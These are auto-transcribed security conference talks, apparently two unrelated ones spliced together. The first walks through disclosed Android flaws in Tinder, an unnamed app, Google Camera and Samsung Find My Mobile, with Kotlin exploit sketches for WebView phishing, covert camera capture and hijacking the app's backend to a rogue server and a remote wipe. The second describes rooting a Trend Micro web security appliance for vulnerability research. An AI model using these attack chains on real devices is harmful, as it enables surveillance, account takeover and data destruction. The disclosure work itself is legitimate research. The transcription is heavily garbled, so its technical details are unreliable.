Case one: the Tinder application. This is a very well-known app that lets you meet people and chat with them. The only background you need is that it shows you pictures of people, you swipe left or right to say you dislike or like them, and if they like you back you have a match and can chat with them in the application.

Let's start with what we did. We began by sniffing and collecting the traffic, and we could see a lot of plain HTTP going on. The HTTP alone immediately tells us that a certain IP and MAC address is using the application, and it tells us more: it lets us match images with user IDs, because the user ID is right there in the URL (highlighted in green). The image resolution is also present (in yellow), which lets us tell whether an image belongs to the user of the app, let's call them the victim, or to someone the victim is chatting with. It also lets us see the other users in discovery, the profiles being suggested for the victim to like or dislike. That is already good visibility and a real invasion of privacy, but going a little deeper, we looked at the HTTPS replies from the API (that is why you see 443 as the source port) and saw that the payload sizes differ and change according to the user's actions. We could make a direct match between the user's actions and the payload size: around 278 bytes for a nope, 374 for a like and 581 for a match, with a margin of 10 or 20 bytes in our parser.

Putting all of this together, we ended up with TinderDrift, an application inspired by Driftnet. If you have a man-in-the-middle position, or some sort of access to the traffic in a network, you can easily identify Tinder users, their MAC address and IP, see all the pictures (the victim's own picture at the top left, the suggested profiles being shown on their device in the center) and their actions: the nopes, the likes and the matches. We also print some traffic at the bottom for debugging purposes. You can see this working in the following quick video.

This video is the TinderDrift software demo. TinderDrift was inspired by Driftnet; it passively analyzes network traffic and is able to identify and profile Tinder clients. Let's start TinderDrift for the demo. This is the app right here; it receives a pcap file, which can be a live capture, and analyzes it. On our mobile phone we start Tinder, and after a while you can see that it has already detected which image I am looking at. TinderDrift takes advantage of the fact that the Tinder app fetches profile images over unencrypted HTTP connections, and it associates those images with a client.
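To make that size heuristic concrete, here is a rough sketch of the kind of classification TinderDrift applies to the encrypted API replies. It is purely illustrative: the byte thresholds are the approximate values mentioned above, the tolerance is an assumption, and the real tool also correlates the unencrypted image requests with each client.

```kotlin
// Rough sketch: infer a Tinder action from the size of an encrypted API reply.
// Thresholds are the approximate sizes from the talk plus a made-up tolerance;
// they are illustrative, not exact protocol constants.
enum class SwipeAction { NOPE, LIKE, MATCH, UNKNOWN }

fun classifyReply(payloadSize: Int, tolerance: Int = 20): SwipeAction {
    val signatures = mapOf(
        SwipeAction.NOPE to 278,
        SwipeAction.LIKE to 374,
        SwipeAction.MATCH to 581
    )
    return signatures.entries
        .firstOrNull { (_, size) -> payloadSize in (size - tolerance)..(size + tolerance) }
        ?.key ?: SwipeAction.UNKNOWN
}

fun main() {
    println(classifyReply(380))   // LIKE
    println(classifyReply(590))   // MATCH
    println(classifyReply(1200))  // UNKNOWN (probably not a swipe response)
}
```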
After that, it analyzes the encrypted HTTPS connections from the client to the Tinder API server and infers the client's behavior from the size of the server responses. When the user swipes left or right, the app sends a request to the API server, and the size of the reply packet can be used to determine which action the user took: a nope, a like, a like that turns into a match, or even a super like. It takes some time to stabilize, and after that the software identifies each action. For example, let's like this profile: when I swipe right you can see in this corner that the image is correctly tagged as a like, and when I swipe left it shows up as a nope. Let's dislike this one as well, and you can see the display update. The software also supports multiple clients; for example, let's switch to an iPhone.

The corporate response was quite fast, but at first they did not consider it a big deal. The story ended up in the news, a massive media storm followed, culminating in a US senator publicly saying that Tinder was vulnerable, and of course that led to a very quick fix, which was positive. There was no bounty because, as far as I recall, there was no bounty program at the time.

Let's move on to case two, "app X". That is not really its name, just a name we made up because we are not legally allowed to say the real one, but that does not matter for explaining the vulnerabilities. We started by listing activities that can be called by other applications, and we found that the main activity will load a malicious URL, because the link validation is very weak. You can see the regex down there: if the URL contains a slash, an "l" character and another slash, the link is considered valid and is loaded by the WebView. So you end up with this: an attacking application creates an intent that opens app X, which then loads the attacker's content in its WebView. We tested this with the activity manager over adb, and it works. We then actually built an attacking application, plus an HTML page identical to the app's original login page, so a user cannot tell our malicious login page from the real one; we can steal the credentials and the application keeps working smoothly.

We tried to take these findings further and found several JavaScript interfaces; as you know, a JavaScript interface is a native Java function exported to the JavaScript running in the WebView. One of them, a setBaseURL function, lets you change the URL of the API, and we can replace it with our own. The change is permanent: from then on the application talks to our malicious API instead of the original one. The app has certificate pinning, and it works well, but it also supports plain HTTP, and the official API answers over both HTTPS and plain HTTP, so this was the perfect scenario for a man-in-the-middle attack. We still needed to trick the victim into installing a malicious app, though, so we tried to go deeper, and we noticed the app registers some deep links.
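Before following the deep-link route, here is roughly what the malicious-app variant described above could look like in code. Everything in it is hypothetical: the package, activity and extra names are placeholders rather than the app's real identifiers, the URL is made up, and the regex is only an approximation of the weak "/l/" check.

```kotlin
import android.content.Intent
import android.net.Uri

// Hypothetical sketch of the rogue-app variant described above.
// Package, activity and extra names are placeholders, not the real identifiers,
// and the regex only approximates the weak "/l/" validation.
val weakValidation = Regex(""".*/l/.*""")

fun launchAppX(activity: android.app.Activity) {
    // An attacker-controlled page that happens to contain "/l/" in its path,
    // so it passes the app's link validation and gets loaded in the WebView.
    val phishingUrl = "https://attacking.example/l/fake-login.html"
    check(weakValidation.matches(phishingUrl))

    val intent = Intent().apply {
        setClassName("com.example.appx", "com.example.appx.MainActivity") // placeholders
        putExtra("url", phishingUrl)                                      // placeholder extra name
        data = Uri.parse(phishingUrl)
    }
    activity.startActivity(intent)
}
```

This simply packages into an app the same test we first ran with the activity manager over adb.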
Let's consider this scheme; of course it is not the real one, we will just call it appx:// for clarity. There is a messaging system in the application, so we started thinking about a way to send a link that exploits this in exactly the same way, but without requiring a malicious application. The chat feature does not support deep links, but it supports regular web links, and the browser will open those and can redirect to a deep link on the appx:// scheme. But how do we then pass our parameter to the main activity? The main activity would open, but with its default HTML content, and we want it to load our malicious URL instead.

We ended up with something like this; this is the full chain of events, and you can see the full exploit URI at the bottom. The appx:// scheme opens the application, and the af_dp parameter is what lets us inject our HTML into the WebView. Starting from the beginning: we no longer need a malicious application, just a message. We send a message containing a web link; as soon as the user opens it, Google Chrome is invoked, requests the malicious page from our server, and our server redirects to that full URI. Android knows the appx:// scheme, so it opens the app X application, and the application loads our http://attacking.site.com URL (a fake domain, just for demonstration). You can see the /l/ in the path, so it passes the validation, and everything works: the same full exploit as before, but without a malicious application. The af_dp parameter is something we found through reverse engineering, and as you can see, its content gets loaded in the WebView.

Summing up: when the victim clicks the link, the attacker can steal their cookies and impersonate them, taking over the account; monitor all the application activity; read private messages; track the victim to their geographic location, because the app has that feature; and even build a wormable exploit, where all of the victim's contacts receive a malicious link and every contact who clicks it forwards it to their own contacts, and so on. And the application always behaves normally in the victim's eyes, so they never know they have been attacked. I was going to show a quick video demonstrating this, but our VLC player crashed, so I'll move on to the corporate response. The response was good and fast, the issue was classified as critical, and it was fixed. There was no bounty, I think because there was no bug bounty program at the time, but there were some legal issues; that was not good, and it could have been avoided, but we will come back to it in the final words. Now I'll hand over to Pedro to talk about the Google Camera application. Pedro?

Thanks, João. Now we are going to look into case number three, the Google Camera. The Google Camera app comes pre-installed on millions of devices, and this research was done in the context of an audit of the Pixel 3. Sometimes, instead of looking at a specific application, we just pick a vendor, buy their latest phone and start looking into the pre-installed applications, since that means a bigger attack surface and more users potentially at risk. In this case we focused on the Google Camera app.
The process is more or less the same once you have been doing Android reversing for a while: you list the activities, broadcast receivers and so on that you can call without permissions, you reverse the APK, you analyze the traffic, and you start reading code. In this case there were a lot of exported activities and defined actions inside the Google Camera app. We started testing the behavior of these activities and actions and looking for interesting things, because sometimes it is easier to probe the application's behavior than to read tons of decompiled, often obfuscated code. We noticed an action called video camera that starts the Google Camera app and immediately starts recording, which caught our eye because there is also a video capture action that does not start recording. Why two different ones? Any other action opens the Google Camera in photo mode but does not take a picture.

The attack scenario we had in mind was a rogue application trying to control the Google Camera app. We mapped out which classes handle which intents and actions, then read the code to figure out whether there are extras, data or actions you can pass that change the execution path or the behavior. We found at least three interesting extras. One, a use-front-camera extra, lets the controlling app choose whether the Google Camera uses the front or the back camera. Another, duration seconds, makes the camera start a timer before taking a picture. And there is an obscure one called something like extra turn screen on, which does exactly what it says: it turns the screen on. Why is this interesting? Because the timer means you can now take a photo without user interaction: we could already record video without interaction, and with the timer, whose hard-coded minimum is three seconds, we can take photos too. The turn-screen-on extra is even more interesting, because it makes the camera app open even if the phone is on standby or locked with a PIN, so you can start the Google Camera from the background and take a picture or record a video. And the photos and videos are stored on the SD card, which, as you know, is easily accessible to any other application holding the READ_EXTERNAL_STORAGE permission.

So we started thinking about how to turn this into a meaningful attack scenario. With this combination, a rogue app can take a picture or record a video without user interaction, even if the phone is locked, and the big problem is that the rogue app does not need any camera permission: it simply abuses the Google Camera app to take those actions on its behalf. We built a PoC called Spixel, a client-server architecture where the client is a rogue weather app that only needs the READ_EXTERNAL_STORAGE permission and the INTERNET permission to talk to the command-and-control server. The command-and-control server listens for every client and has a bunch of interesting features; it can order the rogue app to take a photo or record a video from a chosen camera.
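Under the hood, the trigger the rogue app fires is essentially an intent aimed at the camera app. The sketch below is only an approximation: the action constant is the standard video-camera action, but the package name and the extra names are paraphrased from the talk and should be read as placeholders, not the exact identifiers the Google Camera uses.

```kotlin
import android.app.Activity
import android.content.Intent
import android.provider.MediaStore

// Rough sketch of the rogue app asking the camera app to record without user interaction.
// Extra names (and the target package) are paraphrased placeholders, not exact identifiers.
fun triggerHiddenRecording(activity: Activity, frontCamera: Boolean) {
    val intent = Intent(MediaStore.INTENT_ACTION_VIDEO_CAMERA).apply {
        setPackage("com.google.android.GoogleCamera")   // assumed package name
        putExtra("use_front_camera", frontCamera)       // placeholder
        putExtra("extra_turn_screen_on", true)          // placeholder
        putExtra("duration_seconds", 3)                 // placeholder (hard-coded minimum timer)
    }
    activity.startActivity(intent)
    // The resulting video/photo lands on the SD card, where any app holding
    // READ_EXTERNAL_STORAGE can pick it up and ship it to a C&C server.
}
```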
On top of that, Spixel uses some stealth features we developed to keep the Google Camera app from visibly popping up or making a sound. We can mute all the audio streams, which was actually another issue we reported to Google, because it is not supposed to be possible to mute the phone without the permission to do so; that is another bug. We monitor the proximity sensor to know whether the phone is face down or held against your face during a call, and we built a feature called auto record calls: when you answer the phone and bring it to your face, recording starts, and it is actually possible to hear both sides of the conversation. If EXIF data is enabled, you can grab GPS coordinates and locate the user: for example, order the camera to take a photo and then parse the EXIF data for the GPS position. This part is not strictly related to the vulnerability itself; we just got creative and implemented it in the tool, among other features.

Now a demo. This demo shows the auto record feature when David answers a call; on the right side you can see the image from the camera, superimposed, and this is the attacker side, which receives the video and plays it back in the Spixel interface.

The corporate response was really standard for Google, which is really high for everyone else. We got a reasonably fast response after the first report, and it was classified as a medium-impact vulnerability. Then we shared our tool and an explanation of what we did and how it could bypass a locked phone, and they reclassified it as high impact. From then on the response was really, really fast; they contacted other vendors identified as using the Google Camera or derivatives of it, since other companies were affected as well, and in the end Google granted a 75K USD bounty, which was really cool.

Now we reach our last case, case number four: Samsung Find My Mobile. Find My Mobile is an application that works together with a website; a Samsung account owner can use it to locate a lost phone by logging into the website, making the phone ring, locking it and so on. This research was done in the context of an audit of a Samsung S8, again looking into the default installed applications to see whether there are vulnerabilities there.
The process is much the same: list the activities, look for things reachable by other applications without permissions, reverse the APK, analyze the traffic and so forth. There was not much luck at first, but digging a bit deeper there is a piece of code, which did not even decompile cleanly, that refers to a file on the SD card called fmm.prop. That turned out to be an interesting file: after reversing, it was possible to understand that the program loads the mg.url value, and related URLs, from this file if it exists. Because the file lives on the SD card, a malicious application can create it, and FMM will use it when talking to its backend MG server. The MG server is the management server, and we can control which one is used simply by creating this file and pointing it at any URL we want. That is vulnerability number one.

Creating the file is not enough, though: you have to force FMM to pick it up, and normally that only happens at boot, which is not very useful if you cannot trigger it. This is where vulnerability number two comes in, in a broadcast receiver called the PCW receiver: when it receives an action saying that registration has completed, it proceeds to update the URL. In practice, by sending a broadcast to the PCW receiver, FMM is told that the registration is complete and then contacts the MG server to perform the registration again, and the MG server is now the URL we already control thanks to vulnerability number one. This is interesting because, by pointing the MG URL at an attacker-controlled server and forcing that re-registration, we learn a lot about the user: the phone contacts our server, and the registration request carries the registration ID, the IMEI and more, plus a coarse location via the IP address. Joining these two vulnerabilities together, we effectively have a way to monitor a user remotely; it all happens in the background and the user has no way of knowing.

But just monitoring users is not enough; I wanted more. Looking at the original MG server response, you can see it contains a lot of different URLs: a DM server, a DS server, an OSP server. I never got to the bottom of what every one of these servers is for, but it was nice to see that we can control those other endpoints too, which brings us to vulnerability number three. It lives in another receiver, called the SPP receiver, and there is a magic action, the hexadecimal string starting with fb0bd that you can see there, which tells FMM that a push message has been received. By sending a broadcast with this magic action we can additionally attach an extra containing the push messages. A lot of work went into reversing those messages: they are encrypted, so they are hard to read, but luckily the key was hard-coded, and in the end we do not even have to understand what every message does; we just need to craft the proper one to make FMM talk to the DM server.

While the MG server seems to handle registration and report delivery, the DM server stores the actions the owner performs in the web interface. The website, findmymobile.samsung.com, has a map with an overlay, and depending on the API level the logged-in user can perform a lot of actions: ring the phone, lock it and leave a message, create a backup, retrieve call logs and SMS messages, erase all data on the phone, and more. These actions are executed by the phone when it receives the corresponding messages, but the phone could be offline or somewhere without network access, so an attacker can send the broadcast to the SPP receiver, which makes FMM contact the DM server and fetch any pending actions that were requested while the phone had no connectivity.
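Before looking at what travels over that DM connection, here is a rough recap of vulnerabilities one and two in code form, from the point of view of a malicious app already on the device. The file name and the mg.url key come from the talk, but the exact property format and the broadcast action string are assumptions, shown here only as placeholders.

```kotlin
import android.content.Context
import android.content.Intent
import android.os.Environment
import java.io.File

// Minimal sketch of vulnerabilities 1 and 2 from a malicious co-resident app.
// The file name and the "mg.url" key come from the talk; the property format and
// the broadcast action string are placeholders, not the real identifiers.
fun hijackFmmBackend(context: Context, rogueServer: String) {
    // Vulnerability 1: drop fmm.prop on the (world-readable) external storage,
    // pointing the management-server URL at an attacker-controlled host.
    val prop = File(Environment.getExternalStorageDirectory(), "fmm.prop")
    prop.writeText("mg.url=$rogueServer\n")

    // Vulnerability 2: broadcast the "registration completed" action so FMM
    // re-reads its configuration and re-registers against our rogue MG server,
    // leaking registration ID, IMEI and a coarse (IP-based) location to us.
    context.sendBroadcast(Intent("com.example.REGISTRATION_COMPLETED_PLACEHOLDER"))
}
```

Vulnerability three is then just one more broadcast, this time at the SPP receiver with a crafted, encrypted extra that makes FMM fetch the pending actions from the DM server.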
Now, the communication with the DM server uses a proprietary SyncML implementation, which was a bit hard to figure out; it is not standard SyncML, to the best of my knowledge, and there is a SyncML auth-md5 element in the exchange, so I assumed some kind of authentication and encryption was going on. What happens is that when FMM contacts the DM server, the DM server can reply with a simple OK or with the accumulated actions that were requested while the smartphone was offline. And this is where we come in, because thanks to vulnerability number two we control the MG server and the DM server. But to pull off something closely resembling a man-in-the-middle attack we need a valid certificate, we need to monitor the messages, detect the message types, change the requests on the fly, and bypass this SyncML auth-md5 mechanism, all at the same time, to make everything work.

That brings us to vulnerability number four, the SyncML auth-md5 handling. It has nothing to do with MD5 weaknesses. The authentication protocol seems to work like this: the client connects to the server and sends a SyncML auth-md5 field in the first request, which I assume is a challenge; the server responds with another auth-md5 field, which appears to depend only on the client's original challenge and the IMEI, so I assume it is the response; and from then on the client trusts the server's replies. Why is this important? Because there is no message signing or any other mechanism that prevents message modification, which is great for an attacker in a man-in-the-middle position. You do not even need to reverse the response-verification mechanism to make this work: you just relay the challenge packet to the real server, grab the response, hand it to the client, and from that point on you can freely change the content of the packets, because nothing is signed.

Putting it all together: with vulnerability number one you use the fmm.prop file to point the MG server at your own server; then you send a broadcast to the PCW receiver and spoof the registration response, so that the stored endpoints, including the DM server, are updated to servers you control; then you send another broadcast, to the SPP receiver, which makes FMM contact the DM server and fetch any outstanding actions. You sit in the middle of that connection, forward the challenge packet to the original server, grab the response, and then, since there is no message integrity, inject your own actions into the reply to the client, and the smartphone executes whatever you decided for it. The too-long-didn't-read version: any application could wipe your phone, steal your messages, locate you, or do anything else FMM supports, and depending on the API level it needs no permission beyond SD card access, which is one of the most common permissions there is. It works on a wide range of devices, including the S7, S8 and S9 Plus; this was tested on a lot of phones. And we have a demo, so instead of just claiming that I am able to erase all the contents of the phone, I can actually show it. Here are the server configuration files.
I am going to switch my configured action to "nuke". This video is a bit rough, sorry, I could not record the phone screen at the same time. Here is a Samsung S8, untouched. I start the PoC, and over here I am tailing the logs of the rogue server. I will run the exploit step by step. This is the first step, which changes fmm.prop. This is the second step, and you can already see the rogue server receiving the registration request, so the URL endpoints should now be taken over. And when I run step three, the phone contacts the sync server, the DM server, but it is already spoofed, so the reply will be the nuke, and you can see it happen in real time here, and kaboom, bye bye, dear S8. It is the same flow as in the other video, but the action is different: the action is the erase, so the phone is wiped and the SD card is formatted; everything on the phone is lost. Here you can see the different steps: step one, then the point where the authentication is relayed from the server, the reply to the phone injected with the wipe command (it is hard to see here, but this is the "to be wiped" part), and then the series of steps needed to actually erase the phone.

We worked with Samsung through their bounty program; they are very well organized and issued a fast response after the first report. The issue was classified as a high-impact vulnerability. Then we all realized there was a lot more to it: this kind of behavior touches many different parts, from the application side to the web server side, so some things needed to change and it took a while until a proper fix could be shipped. They granted a 10K USD bounty, and in addition there were some closely related critical flaws, not on the application side and not in the scope of this talk, for which a 25K USD bonus was added, so in the end it was very nice.

That concludes our presentation. We tried to give you a variety of examples of real applications facing different problems: lack of encryption, problems in WebViews, legacy code, intents reachable without permissions. Some of these issues are common to many other applications, and some of them are very Android-specific. Before we go, a few final words. We really believe we are trying to make the world a slightly better place, making people a bit safer online by identifying these vulnerabilities. Luckily, we are paid for this research and do not depend on bounties, but of course they are always appreciated. It is interesting to note that vulnerability complexity does not equal greater impact or bigger rewards: sometimes you spend a lot of time developing a working PoC for a very complex issue, and other times you find a very simple bug with huge impact, and if you are in it for the bounties, the simple one may well pay more. And the final word is that we are friends, not the enemy. We are trying to help companies make better products, often products we actually use ourselves, so we have every interest in making them better; threats and lawsuits are really not necessary. We think of ourselves as friends, and we are not trying to hurt any company's image in any way. I think now we
are open for questions, if anyone wants to ask something. Thank you.
|
In this session, we will analyze four real-world examples of different high-impact Android vulnerabilities. We will show how we discovered, developed, and leveraged the vulnerabilities into fully working proofs of concept, devised meaningful attack scenarios (demos included), and how our work was received by the different vendors.
|
10.5446/51614 (DOI)
|
Alright folks, it's almost the end. But here we are again. Wanted to take a quick second and give a big thanks to our 2020 sponsors that's check marks, Google and Offensive Security. Thank you all so much for helping to make the AppSec Village happen. We could have done it without you. If you haven't gotten your shirt yet, go to AppSecVillage.com and pick up your t-shirt. Also if you're interested in making sure that this is a lasting thing, go out and become a super fan for us. That would go a long way towards helping to make sure that hopefully if next year's DEF CON is in person, AppSec Village will be part of it. Alright, without any further introduction or me talking, we are going to hear a talk from Mehmet Ines, managing partner at Invictus in Cyber Intelligence. He's going to be talking about a haven for hackers, breaking a web security virtual appliance. With that, please help me welcome to the stage Mehmet. Let's talk about finding a zero-day vulnerabilities. In that presentation, I'm trying to take you all to the journey with me to finding different vulnerabilities in a security solutions and combination of them will give us a remote code execution with a root user. This is Mehmet. I've been doing vulnerability researching since 2005 when I'm working for a company in Invictus Cyber Security Intelligence. This is my Twitter address, mdisec, and PanTest.blog is a web page where me and my teammates are sharing our technical research in here. Okay, so haven for hackers third edition. Actually there's a story behind that title and it has started back in 2017. I was doing a PanTest thing for a company and there was a blue team members and they were telling me you are doing this, et cetera, and I was start thinking about what happens if we somehow manage to break into your same product that they are using and write a custom rule in order to become a totally invisible. Because they are telling us what they are seeing in the product and if we become invisible, that would be so nice. That idea led me to defining a remote code execution on a various different C-Mandalog management solutions back in the 2017. After one year, I was trying to send an email to a friend of mine and that dude was not receiving any email from me at all. It turned out that there was a problem on the email security gateways and they managed to solve the problem and eventually we started sending an email to each other. I was thinking that all right, there is an email security gateway products and what happens if I manage to break into your email security gateways so that I can read all the emails incoming and outgoing. That idea motivated me to finding a remote code execution vulnerabilities on Simantec, Micro Focus and the Trank Macro. And previous year, I was working at another client and the project was hardening the client's network in order to finding data exaltration scenarios. They were telling me we have the web security solutions and only that device can connect to the internet so all the clients has to go through that box. If you find a different way to exaltrate the data, that would be nice. I was like, okay, so what happens if you find another zero-day vulnerability on especially the web security and the content filtering solutions so when the attacker managed to execute a code on the client network for the data exaltration and the CT communication phase they can exploit the content filtering solutions. So this is the two days topic. 
We are going to talk about these really vulnerabilities that I found on a very interesting product. And I have a case study for you. There is a product from the Trank Macro interscam web security virtual appliance and I have done the vulnerability research on specifically that solutions and we are going to see what kind of vulnerabilities that I managed to find and using all of those vulnerabilities together, we are going to see some sort of code executions in the end. But before diving into the case study, I would like to talk about what is the content filtering in order to make it crystal clear to everyone. As you can see in the picture, there is a computer on the left which represents a client's network of the company and those devices don't have a direct internet access. They have to go to the proxy service first and that proxy service goes to the internet so that the organization can do some sort of analysis and the rules on the client's network. So content filtering is happening in here right now. We can imagine that the content filtering solutions, they are kind of spatially implemented proxy service and the term is given to do controlling the type of web content that employees, guests, customers can access while they are connected to the business wired or wireless network so that the business may want to apply control over the type of content that can be accessed to stop employees by restricting accesses to certain type of web pages. And on top of that, also the content filtering is a quite a good place to ensure malicious web pages cannot be accessed such as those used for phishing, malicious, distributing malware, etc. So we are targeting that kind of products in this presentation. So at the beginning, I was like I have a too many motivation like a targeting web filter solutions. Why we are doing this? And first and foremost, obviously, all the clients network are going to the internet through that solutions. That means if we manage to break in, we're going to see the whole clients network internet traffic of the organization. And second motivation is as I told you before, clients computer don't have a network access to the internet. They must go through the web filter. So we need to find a better way to see communication in the red teaming scenarios. And I believe that filter solutions is a quite a secure and stealth way to make a city communication. Of course, there is a loss of difference approach like a DNS beginning, etc. etc. But I believe that is a very secure and stealth way. So all right, that is the brief introduction to do idea and the main motivation. And this is the methodology that I usually follow for my vulnerability research projects. And there is a seven steps and we're going to see every single step in details throughout the case study. And first and foremost, we have to find a way to get a free trial of the product that we're going to do vulnerability research on it, because you have to, you know, break into operating system level, and you need to find all the source going on, etc. etc. And you have to test your vulnerabilities and eventually you're going to implement the exploit for the one of these you found. So you have to find a way to get a free trial. And it's not quite easy guys always. It's not quite easy. 
It's sometimes and most of the times it requires to have a loss of meeting with the sales team and if you find them, if you find the free trial of the product, I strongly suggest you to start by reading the documentation because there is administrative documentation of these type of solutions and there's a huge technical information about the product itself. So after that, we are going to find a way to have a route SSH access to the box because we are going to do the vulnerability research. And most of the case, there is operating level hardening and we need to get rid of all of those, you know, hardening stuff. And after that, you know, you are in a situation where you manage to install the software, I mean the solution, you read the documentation and you manage to overcome the operating level system hardening. And that is the moment that you need to start using product itself like a regular user, because you have to understand all the features because those information will become so handy when you need to define a possible attack vector. So after that, we are going to talk about the enumeration and the configuration step. And the most important phase is the defining possible attack vectors because you got all the information you need. It is a time to building attack scenarios and then find a vulnerability is a final step. We are going to see everything step throughout our case. And in that case, I mean the trunk micro interest again, web security, virtual appliance 6.5 version, you can do a lot of it from the vendor web page. So getting a free trial was quite easy in specifically in that case. If you go to the Google and looking for the administrative documentation is an important keyword in here for the Google search. You can directly find the administrator file, which is usually like a 300 pages. I strongly suggest you to read administrative documentation because you're going to see very, very helpful information about the product. As you can see in here, administrative documentation tells us there is a different modes of the product. It can be transparent breach mode. It can be transparent breach mode with high availability, forward proxy, reverse proxy, ICAP, WCCP, etc., etc. So that product can be installed very different modes. And on the right side, you are seeing the forward proxy mode, which tells you that product can participate in a proxy change, forward all the traffic to the upstream proxy servers. And you will be seeing lots of graphics on the administrative documentation, which will help you to understand about the product itself. So we are reading the funny manual as well. And we, of course, for the third step, after the reading the documentation, you need to install the solution into your visualization system. During the installation, there was an admin user and password has been set during the installation and the product gives you an opportunity to do SSH connection to the box with the administrator user. But the problem is there was a restricted shell on the SSH. There is a very, very limited tools that you can use in the SSH interface of the product. And we need to find a way to have a directly SSH connection with the root user, because we are going to do remote debugging. We want to try to find out all the source codes and we're going to do further analysis, etc., etc. So there is a little bit of a step before starting to the vulnerable to research. In that case, it was quite easy because the product was distributed by the vendor as an ISO file. 
So you can directly install it into your VMVural VirtualBox. And when you finish the installation, the idea is you can detach the VMDecard disk from the virtual machine that you just installed, and then you can attach it to the difference in the next machine. And then you're going to mount NIVDisk and you are going to find a graph file, because there was a password protection on the graph file. And I want to get rid of that protection as well. And you just need to remove the password protection line on the graph file. And after that, in order to get rid of the restricted shell thing, you can go to the shtconfig file and you can enable the remote root login. And if you do that, you need to go to the.etc.paths.vd file and add BimBesh for the root user, which will give us a direct SSH connection with a root user without having any restricted shell at all. And we have to undo every single thing that we have done so far. So that means you need to unmount the disk, detach the VMDecard file, and attach it back to the original VM and reboot the machine, actually. And in that case, you are going to have the direct root SSH connection to the box. This is important. We need to get rid of operating level hardening. So we are kind of ready to start using product itself. In that case, I choose the reverse proxy mode, but I believe all the vulnerabilities that we have found exist no matter what is the installation mode at all. And for the first step, I certainly suggest you to use a product for a day to get used to about the features itself, because there is a lot of functionalities you can see in the picture. There is a URL access control, actually, the decryption. Right now, we know that product can offload to SSL at all. That means we can deploy SSL through the administrator interface. And there is an advanced threat protection on the left side of the menu. As you can see, I hope you are seeing my mouse pointer in here. There is an advanced threat protection. That means all the HTTP or HTTPS traffic will be analyzed by the product in order to find out malicious activities because of that feature. So later of that presentation, guys, we are going to see how important it is to understand and getting familiar with the product interface. It's quite important. Just use it like a normal user. So we have such access with a root user. So the initial step is always enumerating the services. This is what I'm doing. Of course, that would be a better way to do it, but this is my way to do. So I always looking for the nested command to find out what kind of services we have in the product itself. As you can see in here, there is a UWSGI, which lists in support 611. That means we are doing some sort of assumptions in that phase. So that most probably means there is a Python project running in the internal system. And there is a Java process which lists things exact port of the administrator interface. That means we are going to deal with the Java when the time comes to do doing a research on the administrator interface. There's another UWSGI in here. And that is another important thing because as I said before, that product acts as a proxy service. So that must be as some service on the product itself in order to handle incoming HTTP connections from the user. So I ask IWSSD process that you are seeing in here, which lists in support 8881. This is responsible for all the incoming connection from the client's network. 
So this is the majority part of the product itself because that is the one who is communicating with the clients. All right. So those are the services that we have in the product, but we need to find which of those services are allowed to communicate with the different computers in the network because in the end, we need to explain at least one of those services. So what I'm doing for to find out that information, I usually run an M-Mapscan from my main host to the product IP address, or you can just use the IP table slash this command to find out the IP table's rules. So according to that rule, most of the internal services has been forbidden to network traffic from the outside of the machine. You guys are remembering the IWSGI service. If you keep doing enumeration, we are seeing very interesting information in here. As you can see in here, there is a supervisor, the which responsible for starting the solar service. So right now, we know there is a purchase solar and lots of Python services in the box. So what is a purchase solar? It is an open source enterprise search platform written in Java. It's a major feature is included full tech search, highlighting the time indexing, dynamic clustering, et cetera, et cetera. So that means that Python project that we are seeing in here is responsible reading and writing the log file into the purchase solar service. So most probably, whenever the request comes to the proxy service from the client's network, the proxy service is sending some sort of signals to the Python project that we have seen in here. It's something like an internal microservice. So that Python project is taking the information and writing it into the purchase solar service. So whenever the administrator user tried to query something through the administrator interface, that request will be coming to the Python project as well, because the naming convention in here is the dashboard parse, main, starts parse, summary parse. There's a lot of log parsing and writing to those purchase solar service. And whenever it needs to be the access by the administrator interface, that Python project is taking the responsibility again. So it is quite important to know there is a purchase solar service within the box. But unfortunately, due to the IP table's rule that we have in here, we're not going to be able to directly communicate with the purchase solar at the beginning. But later on the presentation, we will find a way to do it. So all right, let's talk about IOS, IWD SSD process. If you grab it from the process three, you are seeing the full path of the binary. And if you look for the file type, it is a symbolic link to the IWD SSD process, which is SUID LFI binary. And there is a 61 module in that binary. So it's a very huge binary. And we can, of course, target that process, but it will be requiring lots of reverse engineering. So of course, we are going to do that at some point. But one of the most important attack servers, as you can imagine, it is a process service itself. So so far, I believe I just spent 20 minutes, I guess, and we managed to collect enough level of information about product itself. So it is time to define attack vectors in a light of those information that we got so far. So we know that administrator interface is written with Java. And there is a process service, which is written with C++. I haven't told that before, but it is a C++ guys, this is my bad story. And there is a loss of internal services, but most of them are not accessible from outside of the box. 
And you guys are remembering SSL decryption and advanced threat protection features of the administrator interface. So we know that it does offloading SSL, it parsed HTML contents, scams files, et cetera, et cetera. So my idea at that phase, my idea was, OK, let's start with the administrator. We can go after process service if it needs to be. Let's start with administrator interface at the beginning. But there is a loss of possible attack scenarios, as you can imagine. If you want to, let's say, target the HTML parser of the product, like a browser exploitation, you can just send that phishing email to one of the employees of the company that contains a link. Whenever the user clicks on that link, that request will be sent to the process service. And process service is going to take that request from the clients. And it's going to send exactly the same request to the destination server, which is a web page that attacker can control. And whenever the process service gets the response, it performs analysis. It has to parse HTML content as a scandal file. So that means you can directly attack to the HTML parser engine of the product. There is a loss of difference possible attack vectors. That was just one example that just popped in my mind right now during the presentation. We are going to talk about the administrator interface. And then we're going to talk about the process service. You know, as you know, it is a Java project. And I like to working on the Java project. And every single time, whenever I'm facing with a Java application, I always start by reading the configuration file. Because the web.xml, Strat-Strat.xml, all of those XML files contain a very good high level of understanding information about the software that we are going to do. Vulnerability research. And I don't want to live in an SSH connection during wall vulnerability research. So we need to find that all the location of the jar file by using just find comment on the step two. And then you can copy all of them to your main host to further analysis. Because we are going to deal with lots of jar files. And I strongly suggest you to use IDEs. I used to use GDI for the compiling of the jar files. But those kind of projects has hundreds of different jar files. And if you put all of the jar files into the GDI, why it wasn't working for me, it was just crashing or freezing, because it has to compile all the class and the functions and they need to find all the cross calls. So I strongly suggest you to use IntelliJ or Eclipse for that purpose. And if you are up to use the IntelliJ IDE, there is a Java compiler.jar file under the compiler library, which comes by default with IntelliJ, I guess. And you can compile all the jar files under the lib folder. You can change the name, of course. And we are going to put all the compile files under the lib-compile folder. And if you go to the IntelliJ interface and look for the project settings, there is a library section in here, you can import those libraries and sources all together, which will tell the IntelliJ to, this is my Java software, IntelliJ will take the rest of the job, it's going to process all the classes. And you're going to be able to just finding a function that you are interested in, you will be just clicking it to go to the definition. And also, you can find a very interesting function that might be a problem in the definition. You can just by using the IDEs, you can find all the different locations where the specific function has been called. 
